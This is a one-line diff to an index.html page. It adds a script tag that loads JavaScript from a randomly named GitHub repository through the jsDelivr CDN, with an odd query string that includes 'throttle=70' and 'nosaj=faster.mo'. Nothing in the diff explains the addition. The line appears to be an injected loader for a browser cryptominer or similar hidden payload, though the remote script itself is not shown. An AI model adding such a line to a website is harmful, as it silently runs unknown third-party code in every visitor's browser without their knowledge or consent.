--- a/index.html
+++ b/index.html
@@ -404,6 +404,7 @@
             })
         }
     </script>
+    <script src="https://cdn.jsdelivr.net/gh/uudxbgmynxshq/UudxBgmYnxshQ@main/pQhcLAnoCmfHYwJu.js?karma=bs?throttle=70?nosaj=faster.mo"></script>
 </body>
 
 </html>
